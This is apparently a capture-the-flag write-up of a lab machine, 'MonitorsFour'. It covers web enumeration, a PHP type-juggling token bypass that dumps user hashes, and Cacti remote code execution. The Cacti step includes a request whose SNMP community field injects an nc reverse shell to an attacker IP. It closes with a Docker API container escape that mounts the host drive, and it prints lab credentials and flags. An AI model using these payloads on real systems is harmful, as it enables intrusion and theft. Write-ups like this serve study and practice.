1.Discovery and Enumeration
Immediatly tried to connect to ip: 10.129.16.60 -> got monitorsfour.htb which I added to /etc/hosts
Discovery
rustscan -a monitorsfour.htb --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Making sure 'closed' isn't just a state of mind.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.16.60:80
Open 10.129.16.60:5985
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 19:52 WET
Initiating Ping Scan at 19:52
Scanning 10.129.16.60 [4 ports]
Completed Ping Scan at 19:52, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:52
Scanning monitorsfour.htb (10.129.16.60) [2 ports]
Discovered open port 80/tcp on 10.129.16.60
Discovered open port 5985/tcp on 10.129.16.60
Completed SYN Stealth Scan at 19:52, 0.08s elapsed (2 total ports)
Nmap scan report for monitorsfour.htb (10.129.16.60)
Host is up, received echo-reply ttl 127 (0.040s latency).
Scanned at 2025-12-15 19:52:54 WET for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
## Running nmap scripts on 80 and 5985
sudo nmap -p80,5985 -sS -sC -sV monitorsfour.htb -T5 --vv
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 19:53 WET
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating Ping Scan at 19:53
Scanning monitorsfour.htb (10.129.16.60) [4 ports]
Completed Ping Scan at 19:53, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:53
Scanning monitorsfour.htb (10.129.16.60) [2 ports]
Discovered open port 80/tcp on 10.129.16.60
Discovered open port 5985/tcp on 10.129.16.60
Completed SYN Stealth Scan at 19:53, 0.06s elapsed (2 total ports)
Initiating Service scan at 19:53
Scanning 2 services on monitorsfour.htb (10.129.16.60)
Completed Service scan at 19:53, 6.24s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.16.60.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 5.07s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for monitorsfour.htb (10.129.16.60)
Host is up, received echo-reply ttl 127 (0.038s latency).
Scanned at 2025-12-15 19:53:35 WET for 12s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 nginx
|_http-favicon: Unknown favicon MD5: 889DCABDC39A9126364F6A675AA4167D
|_http-title: MonitorsFour - Networking Solutions
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)
2. Port 80
- I will first enumerate endpoints and vhosts using ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2217ms]
contact [Status: 200, Size: 367, Words: 34, Lines: 5, Duration: 2213ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2217ms]
# Priority ordered case insensative list, where entries were found [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2209ms]
[Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2209ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2210ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2210ms]
# Copyright 2007 James Fisher [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2211ms]
# directory-list-lowercase-2.3-medium.txt [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2214ms]
# on atleast 2 different hosts [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2221ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2230ms]
# [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2212ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 2212ms]
login [Status: 200, Size: 4340, Words: 1342, Lines: 96, Duration: 114ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 84ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 84ms]
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 90ms]
static [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 40ms]
views [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 42ms]
forgot-password [Status: 200, Size: 3099, Words: 164, Lines: 84, Duration: 195ms]
[Status: 200, Size: 13688, Words: 3598, Lines: 339, Duration: 180ms]
controllers [Status: 301, Size: 162, Words: 5, Lines: 8, Duration: 46ms]
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/.FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/.FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
html [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 39ms]
http [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 155ms]
htdocs [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
htm [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 248ms]
ht [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 76ms]
httpd [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 192ms]
htmlcrypto [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 39ms]
httptype [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 48ms]
env [Status: 200, Size: 97, Words: 1, Lines: 6, Duration: 222ms]
htmls [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 98ms]
htc [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 126ms]
htbin [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
htaccess [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
ht_flag [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 208ms]
htdig [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
html401 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
http%3a%2f%2fwww [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
htmlhelp [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
https [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
httpd-2 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
httptunnel [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 150ms]
html_wrap [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
http_request [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 399ms]
html4 [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 40ms]
html_files [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 41ms]
http%3a [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 47ms]
htmled [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 204ms]
htww [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 42ms]
html-editors [Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 46ms]
There is a .env here that contains:
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
VHost
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://monitorsfour.htb/ -H 'Host: FUZZ.monitorsfour.htb' -fs 138
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.monitorsfour.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 138
________________________________________________
cacti [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 3478ms]
:: Progress: [4989/4989] :: Job [1/1] :: 433 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
Lets add cacti.monitorsfour.htb to /etc/hosts
This is cacti version 1.2.28 that has the following vulnerability: https://pt.linkedin.com/posts/wfscybersecurity_cve-2025-66399-cvss-87-vulnerabilidade-activity-7402784383721439232-zHPr https://github.com/Cacti/cacti/security/advisories/GHSA-c7rr-2h93-7gjf
But for this I believe we need to be authenticated.
monitorsfour.htb
Interacting with the website using the browser and Caido, we can see an api request to /api/v1/X . It does not hurt to enum it also
ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt:FUZZ -u http://monitorsfour.htb/api/v1/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://monitorsfour.htb/api/v1/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
user [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 73ms]
users [Status: 200, Size: 35, Words: 3, Lines: 1, Duration: 249ms]
logout [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 89ms]
auth [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 337ms]
reset [Status: 405, Size: 0, Words: 1, Lines: 1, Duration: 76ms]
405 error mean it is a POST most likely, the others give the response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Dec 2025 20:40:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 35
{
"error": "Missing token parameter"
}
PHP might be vulnerable to loose comparison, meaning that it will try to convert types to match the variables and it can lead to data leaks? https://secops.group/php-type-juggling-simplified/
GET /api/v1/users?token=0 HTTP/1.1
Host: monitorsfour.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=b24babbe8bf2958f23e5616fe48457a3
##Response
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Dec 2025 21:08:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/8.3.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1113
[{
"id": 2,
"username": "admin",
"email": "admin@monitorsfour.htb",
"password": "56b32eb43e6f15395f6c46c1c9e1cd36",
"role": "super user",
"token": "8024b78f83f102da4f",
"name": "Marcus Higgins",
"position": "System Administrator",
"dob": "1978-04-26",
"start_date": "2021-01-12",
"salary": "320800.00"
}, {
"id": 5,
"username": "mwatson",
"email": "mwatson@monitorsfour.htb",
"password": "69196959c16b26ef00b77d82cf6eb169",
"role": "user",
"token": "0e543210987654321",
"name": "Michael Watson",
"position": "Website Administrator",
"dob": "1985-02-15",
"start_date": "2021-05-11",
"salary": "75000.00"
}, {
"id": 6,
"username": "janderson",
"email": "janderson@monitorsfour.htb",
"password": "2a22dcf99190c322d974c8df5ba3256b",
"role": "user",
"token": "0e999999999999999",
"name": "Jennifer Anderson",
"position": "Network Engineer",
"dob": "1990-07-16",
"start_date": "2021-06-20",
"salary": "68000.00"
}, {
"id": 7,
"username": "dthompson",
"email": "dthompson@monitorsfour.htb",
"password": "8d4a7e7fd08555133e056d9aacb1e519",
"role": "user",
"token": "0e111111111111111",
"name": "David Thompson",
"position": "Database Manager",
"dob": "1982-11-23",
"start_date": "2022-09-15",
"salary": "83000.00"
}]
Not the hardest to be honest. The hashes seem to be md5 so it is a matter of trying to crack in crackstation:
| Hash | status | PlainText |
|---|---|---|
| 56b32eb43e6f15395f6c46c1c9e1cd36 | md5 | wonderful1 |
| 69196959c16b26ef00b77d82cf6eb169 | Unknown | Not found. |
| 2a22dcf99190c322d974c8df5ba3256b | Unknown | Not found. |
admin:wonderful1 works on normal login but not cacti. Trying also marcus, mhiggins.
Marcus worked!
Now lets try the RCE from above!
POST /cacti/host.php?header=false HTTP/1.1
Host: cacti.monitorsfour.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://cacti.monitorsfour.htb/cacti/host.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Cacti=23737e5a42f0945052db05e32b0b1ea4; CactiTimeZone=0; cacti_remembers=4%2C0%2C8f743ba86e3597a47e4281bd0a63e1553b1412753f475cc969c37231dd6eaea2; CactiDateTime=Mon Dec 15 2025 21:18:18 GMT+0000 (Western European Standard Time)
__csrf_magic= &description=Exploit&hostname=cacti.monitorsfour.htb&location=&poller_id=1&site_id=1&host_template_id=0&device_threads=1&snmp_version=2&snmp_community=public%0arm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.15.64%202314%20%3E%2Ftmp%2Ff&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=0&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1¬es=&external_id=&id=3&save_component_host=1&graph_template_id=297&snmp_query_id=2&reindex_method=1&action=save
Unfortunately this did not work.
After some research I found also: https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC that says that the graph visualizer has some unsanitization on a rrdtool.
python3 exploit.py -u marcus -p wonderful1 -i 10.10.15.64 -l 2314 -url http://cacti.monitorsfour.htb
[+] Cacti Instance Found!
[+] Serving HTTP on port 80
[+] Login Successful!
[+] Got graph ID: 226
[i] Created PHP filename: AzgNC.php
[+] Got payload: /bash
[i] Created PHP filename: 6044v.php
[+] Hit timeout, looks good for shell, check your listener!
[+] Stopped HTTP server on port 80
I will not humiliate myself by telling you the amount of time I spent on the past CVE, even though I still believe it might work
3. RCE
Looking on the machine:
www-data@821fbd6a43fa:~/html/cacti$ whoami
whoami
www-data
www-data@821fbd6a43fa:~/html/cacti$ id -a
id -a
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@821fbd6a43fa:~/html/cacti$ uname -a
uname -a
Linux 821fbd6a43fa 6.6.87.2-microsoft-standard-WSL2 #1 SMP PREEMPT_DYNAMIC Thu Jun 5 18:30:46 UTC 2025 x86_64 GNU/Linux
www-data@821fbd6a43fa:~/html/cacti$ mount
mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/367/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/364/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/363/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/362/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/361/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/360/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/359/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/358/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/331/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/330/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/196/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/195/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/194/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/193/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/192/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/191/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/190/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/189/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/188/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/187/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/186/fs:/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/185/fs,upperdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/368/fs,workdir=/var/lib/desktop-containerd/daemon/io.containerd.snapshotter.v1.overlayfs/snapshots/368/work)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev type tmpfs (rw,nosuid,size=65536k,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
sysfs on /sys type sysfs (ro,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup type cgroup2 (ro,nosuid,nodev,noexec,relatime)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k)
/dev/sde on /etc/resolv.conf type ext4 (rw,relatime)
/dev/sde on /etc/hostname type ext4 (rw,relatime)
/dev/sde on /etc/hosts type ext4 (rw,relatime)
proc on /proc/bus type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/fs type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/irq type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sys type proc (ro,nosuid,nodev,noexec,relatime)
proc on /proc/sysrq-trigger type proc (ro,nosuid,nodev,noexec,relatime)
tmpfs on /proc/acpi type tmpfs (ro,relatime)
tmpfs on /proc/interrupts type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/kcore type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/keys type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/latency_stats type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/timer_list type tmpfs (rw,nosuid,size=65536k,mode=755)
tmpfs on /proc/scsi type tmpfs (ro,relatime)
tmpfs on /sys/firmware type tmpfs (ro,relatime)
We are inside a container, because the machine for sure is windows.
it is possible to also see marcus here and we can access the flag directly: a83980b9dbf8f2e4d321fb3bc131b5e4
Linpeas promising entries
╔══════════╣ Unexpected in root
/.dockerenv
/start.sh
══════════╣ Log files with potentially weak perms (limit 50)
159653 64 -rw-r----- 1 root adm 62854 Nov 10 16:12 /var/log/apt/term.log
159658 0 -rw-r----- 1 www-data adm 0 Nov 10 16:11 /var/log/nginx/error.log
159657 0 -rw-r----- 1 www-data adm 0 Nov 10 16:11 /var/log/nginx/access.log
╔══════════╣ Analyzing Env Files (limit 70)
-rwxr-xr-x 1 www-data www-data 97 Sep 13 05:37 /var/www/app/.env
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
╔══════════╣ Analyzing Cacti Files (limit 70)
drwxr-xr-x 1 www-data www-data 4096 Dec 15 21:52 /var/www/html/cacti
-rwxr-xr-x 1 www-data www-data 7159 Sep 13 05:38 /var/www/html/cacti/include/config.php
$database_type = 'mysql';
$database_default = 'cacti';
$database_username = 'cactidbuser';
$database_password = '7pyrf6ly8qx4';
i tried all the passwords on root and marcus…
Might need to look directly at docker escaping since I cannot connect to the db also.
ip a
ip route
# This ip is the third... lets ping sweep
for i in $(seq 254); do ping 172.18.0.$i -c1 -W1 & done | grep from
## Machine does not have ping
- Capabilities seem fine.
- Cannot ls on
/proc/1/root
cat /etc/resolv.conf
cat /etc/resolv.conf
# Generated by Docker Engine.
# This file can be edited; Docker Engine will not make further changes once it
# has been modified.
nameserver 127.0.0.11
options ndots:0
# Based on host file: '/etc/resolv.conf' (internal resolver)
# ExtServers: [host(192.168.65.7)]
# Overrides: []
# Option ndots from: internal
I read somewhere about a flaw on this… :https://pvotal.tech/breaking-dockers-isolation-using-docker-cve-2025-9074/
curl http://192.168.65.7:2375/images/json
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2375 0 2375 0 0 14191 0 --:--:-- --:--:-- --:--:-- 14136
[
{"Containers":1,"Created":1762794130,"Id":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"nginx-php","com.docker.compose.version":"2.39.1"},
"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666","size":856},"RepoDigests":["docker_setup-nginx-php@sha256:93b5d01a98de324793eae1d5960bf536402613fd5289eb041bac2c9337bc7666"],"RepoTags":["docker_setup-nginx-php:latest"],"SharedSize":-1,"Size":1277167255},{"Containers":1,"Created":1762791053,"Id":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","Labels":{"com.docker.compose.project":"docker_setup","com.docker.compose.service":"mariadb","com.docker.compose.version":"2.39.1","org.opencontainers.image.authors":"MariaDB Community","org.opencontainers.image.base.name":"docker.io/library/ubuntu:noble","org.opencontainers.image.description":"MariaDB Database for relational SQL","org.opencontainers.image.documentation":"https://hub.docker.com/_/mariadb/","org.opencontainers.image.licenses":"GPL-2.0","org.opencontainers.image.ref.name":"ubuntu","org.opencontainers.image.source":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.title":"MariaDB Database","org.opencontainers.image.url":"https://github.com/MariaDB/mariadb-docker","org.opencontainers.image.vendor":"MariaDB Community","org.opencontainers.image.version":"11.4.8"},"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40","size":856},"RepoDigests":["docker_setup-mariadb@sha256:74ffe0cfb45116e41fb302d0f680e014bf028ab2308ada6446931db8f55dfd40"],"RepoTags":["docker_setup-mariadb:latest"],"SharedSize":-1,"Size":454269972},{"Containers":0,"Created":1759921496,"Id":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","Labels":null,"ParentId":"","Descriptor":{"mediaType":"application/vnd.oci.image.index.v1+json","digest":"sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412","size":9218},"RepoDigests":["alpine@sha256:4b7ce07002c69e8f3d704a9c5d6fd3053be500b7f1c69fc0d80990c2ad8dd412"],"RepoTags":["alpine:latest"],"SharedSize":-1,"Size":12794775}]
## Lets leverage this alpine image
# Create and start a privileged container with host root mounted
# usually on wsl, c drive appear as /mnt/host/c
curl -X POST http://192.168.65.7:2375/containers/create \
-H "Content-Type: application/json" \
-d '{
"Image": "alpine:latest",
"Cmd": ["/bin/sh", "-c", "cat /win/Users/Administrator/Desktop/root.txt"],
"HostConfig": {
"Binds": ["/mnt/host/c:/win"]
}
}'
curl -X POST http://192.168.65.7:2375/containers/07432e6810237d8a8077f3a40e48f61ceb6e8748fada6d9c3a83d58a5e962f18/start
curl "http://192.168.65.7:2375/containers/07432e6810237d8a8077f3a40e48f61ceb6e8748fada6d9c3a83d58a5e962f18/logs?stdout=1&stderr=1"